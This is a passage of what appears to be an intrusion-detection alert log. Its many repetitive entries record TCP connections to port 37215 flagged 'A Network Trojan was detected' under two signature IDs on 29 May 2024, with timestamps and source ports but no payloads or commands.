                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782709
                SID:2829579
                Source Port:52810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.223419
                SID:2829579
                Source Port:40696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663728
                SID:2835222
                Source Port:53096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.870140
                SID:2829579
                Source Port:45218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.730651
                SID:2829579
                Source Port:60568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.971295
                SID:2835222
                Source Port:43832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.841851
                SID:2829579
                Source Port:50960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.872867
                SID:2835222
                Source Port:37224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.283791
                SID:2835222
                Source Port:43762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038456
                SID:2829579
                Source Port:34772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.509250
                SID:2829579
                Source Port:57580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653867
                SID:2829579
                Source Port:37150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.287895
                SID:2829579
                Source Port:50358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.962382
                SID:2835222
                Source Port:56866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231951
                SID:2835222
                Source Port:56742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.169087
                SID:2829579
                Source Port:39758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.785960
                SID:2835222
                Source Port:36440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.917168
                SID:2829579
                Source Port:55604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.728465
                SID:2835222
                Source Port:51772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.417116
                SID:2829579
                Source Port:60814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.113331
                SID:2829579
                Source Port:46538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.285054
                SID:2829579
                Source Port:51960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559020
                SID:2829579
                Source Port:43322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287138
                SID:2829579
                Source Port:34338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.081891
                SID:2829579
                Source Port:46440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675224
                SID:2835222
                Source Port:51692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.500525
                SID:2829579
                Source Port:44450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.285688
                SID:2829579
                Source Port:38276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.787118
                SID:2835222
                Source Port:49928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227618
                SID:2829579
                Source Port:48484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.460408
                SID:2829579
                Source Port:40356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.858081
                SID:2835222
                Source Port:42224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.564847
                SID:2835222
                Source Port:49602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.611887
                SID:2829579
                Source Port:58216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.988802
                SID:2829579
                Source Port:44236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.712418
                SID:2829579
                Source Port:57154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765729
                SID:2829579
                Source Port:35572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.177184
                SID:2835222
                Source Port:36296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.507060
                SID:2835222
                Source Port:55024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.531470
                SID:2829579
                Source Port:58026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.772313
                SID:2829579
                Source Port:42998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.876214
                SID:2829579
                Source Port:35104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.034638
                SID:2835222
                Source Port:55210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.010514
                SID:2835222
                Source Port:48144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583450
                SID:2829579
                Source Port:39448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.183028
                SID:2829579
                Source Port:35592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.575773
                SID:2835222
                Source Port:40314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362813
                SID:2829579
                Source Port:44296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.434678
                SID:2835222
                Source Port:34268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.240662
                SID:2835222
                Source Port:42242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.714558
                SID:2829579
                Source Port:34730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163775
                SID:2835222
                Source Port:50678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.283208
                SID:2829579
                Source Port:33740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.742680
                SID:2829579
                Source Port:54492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.029628
                SID:2829579
                Source Port:55658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.886039
                SID:2829579
                Source Port:43514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369535
                SID:2835222
                Source Port:45024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.001247
                SID:2829579
                Source Port:41342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767630
                SID:2835222
                Source Port:37556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.959095
                SID:2829579
                Source Port:34870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.813335
                SID:2829579
                Source Port:57666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.993736
                SID:2829579
                Source Port:54198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.284591
                SID:2829579
                Source Port:41674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.172840
                SID:2835222
                Source Port:48860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.576597
                SID:2829579
                Source Port:43628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.287116
                SID:2835222
                Source Port:50182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.507213
                SID:2835222
                Source Port:59332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.715399
                SID:2835222
                Source Port:33378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653031
                SID:2835222
                Source Port:33430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.015010
                SID:2835222
                Source Port:54842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.946772
                SID:2829579
                Source Port:47610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.330576
                SID:2835222
                Source Port:49922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.380935
                SID:2835222
                Source Port:50076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765233
                SID:2835222
                Source Port:33006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.685631
                SID:2829579
                Source Port:37632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.386027
                SID:2835222
                Source Port:59424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.653963
                SID:2835222
                Source Port:37990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.331637
                SID:2829579
                Source Port:55164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.581189
                SID:2829579
                Source Port:56502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.810336
                SID:2835222
                Source Port:35264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.265165
                SID:2829579
                Source Port:51826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.668825
                SID:2829579
                Source Port:32930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.964196
                SID:2835222
                Source Port:48204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141182
                SID:2829579
                Source Port:37832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.706455
                SID:2829579
                Source Port:54410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.643280
                SID:2835222
                Source Port:43442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.615289
                SID:2829579
                Source Port:37558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363343
                SID:2829579
                Source Port:58824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.501824
                SID:2829579
                Source Port:36146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.801375
                SID:2835222
                Source Port:52706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.994448
                SID:2835222
                Source Port:37570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.076215
                SID:2835222
                Source Port:46110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.672412
                SID:2835222
                Source Port:56250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.001780
                SID:2829579
                Source Port:53564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.783778
                SID:2835222
                Source Port:37098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.071257
                SID:2829579
                Source Port:37154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519241
                SID:2835222
                Source Port:58888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.241704
                SID:2835222
                Source Port:45892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.225507
                SID:2829579
                Source Port:51278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728627
                SID:2835222
                Source Port:37718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227660
                SID:2829579
                Source Port:44146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.809651
                SID:2835222
                Source Port:58814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263711
                SID:2829579
                Source Port:59120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.809237
                SID:2835222
                Source Port:39588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.983107
                SID:2835222
                Source Port:34772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.962659
                SID:2829579
                Source Port:43210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.989172
                SID:2835222
                Source Port:59008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.171018
                SID:2835222
                Source Port:35072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.811794
                SID:2829579
                Source Port:45320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.514115
                SID:2829579
                Source Port:55570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.668629
                SID:2829579
                Source Port:46316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.024642
                SID:2829579
                Source Port:46612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.639069
                SID:2835222
                Source Port:35574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.220816
                SID:2835222
                Source Port:55422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.896833
                SID:2829579
                Source Port:53110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928495
                SID:2835222
                Source Port:39372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.472368
                SID:2829579
                Source Port:33488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.832850
                SID:2829579
                Source Port:53742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281443
                SID:2835222
                Source Port:35688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612976
                SID:2829579
                Source Port:59142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.176845
                SID:2829579
                Source Port:60048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.869494
                SID:2835222
                Source Port:56524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.466000
                SID:2835222
                Source Port:48756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519102
                SID:2829579
                Source Port:60098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.462451
                SID:2829579
                Source Port:52180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968293
                SID:2829579
                Source Port:40042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.868156
                SID:2835222
                Source Port:39736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.844691
                SID:2835222
                Source Port:37934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.858462
                SID:2835222
                Source Port:57194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.229235
                SID:2835222
                Source Port:39438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.331709
                SID:2829579
                Source Port:39196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.967497
                SID:2835222
                Source Port:33718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.317215
                SID:2829579
                Source Port:41968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.839776
                SID:2829579
                Source Port:59216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.980296
                SID:2835222
                Source Port:44190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.702106
                SID:2835222
                Source Port:36714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.685022
                SID:2829579
                Source Port:60714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.630063
                SID:2829579
                Source Port:47166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.858607
                SID:2835222
                Source Port:44254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.125570
                SID:2835222
                Source Port:37372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870297
                SID:2835222
                Source Port:57542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.688286
                SID:2829579
                Source Port:41884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870182
                SID:2835222
                Source Port:42762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843516
                SID:2829579
                Source Port:51974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.987302
                SID:2835222
                Source Port:51692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.242158
                SID:2829579
                Source Port:60518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.220566
                SID:2829579
                Source Port:43862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.799610
                SID:2835222
                Source Port:46762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.282108
                SID:2835222
                Source Port:42880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.965451
                SID:2829579
                Source Port:49946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.836248
                SID:2829579
                Source Port:57128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.859029
                SID:2835222
                Source Port:59032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559313
                SID:2835222
                Source Port:59278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.221505
                SID:2829579
                Source Port:40318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.447330
                SID:2835222
                Source Port:59480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728230
                SID:2835222
                Source Port:34716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.910035
                SID:2829579
                Source Port:33820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.722273
                SID:2829579
                Source Port:51780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.639535
                SID:2829579
                Source Port:48722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.465457
                SID:2835222
                Source Port:37524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.740657
                SID:2835222
                Source Port:43070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212082
                SID:2829579
                Source Port:35894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.879237
                SID:2835222
                Source Port:49040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681602
                SID:2835222
                Source Port:60956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.815599
                SID:2829579
                Source Port:34790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042477
                SID:2835222
                Source Port:51814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135811
                SID:2829579
                Source Port:51642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.215397
                SID:2829579
                Source Port:48280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.465848
                SID:2835222
                Source Port:51424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.286058
                SID:2835222
                Source Port:41450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782967
                SID:2829579
                Source Port:39338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.842358
                SID:2829579
                Source Port:52072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361613
                SID:2835222
                Source Port:58032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.968248
                SID:2835222
                Source Port:56570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.551466
                SID:2835222
                Source Port:35740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163812
                SID:2829579
                Source Port:35496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.233792
                SID:2835222
                Source Port:50940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.161222
                SID:2835222
                Source Port:47810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.859644
                SID:2835222
                Source Port:60774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.776630
                SID:2835222
                Source Port:60894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.550668
                SID:2835222
                Source Port:37278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.503504
                SID:2835222
                Source Port:50392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.795221
                SID:2835222
                Source Port:38602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.120475
                SID:2829579
                Source Port:35464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.292022
                SID:2835222
                Source Port:53306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767594
                SID:2829579
                Source Port:42376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.518993
                SID:2829579
                Source Port:49604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.431195
                SID:2835222
                Source Port:38966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.170220
                SID:2829579
                Source Port:41340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899636
                SID:2829579
                Source Port:33726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.141545
                SID:2835222
                Source Port:47908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.512244
                SID:2835222
                Source Port:57174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.741992
                SID:2829579
                Source Port:46858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.712069
                SID:2829579
                Source Port:39364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.519335
                SID:2835222
                Source Port:56286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.944765
                SID:2835222
                Source Port:46696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.778423
                SID:2835222
                Source Port:43210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
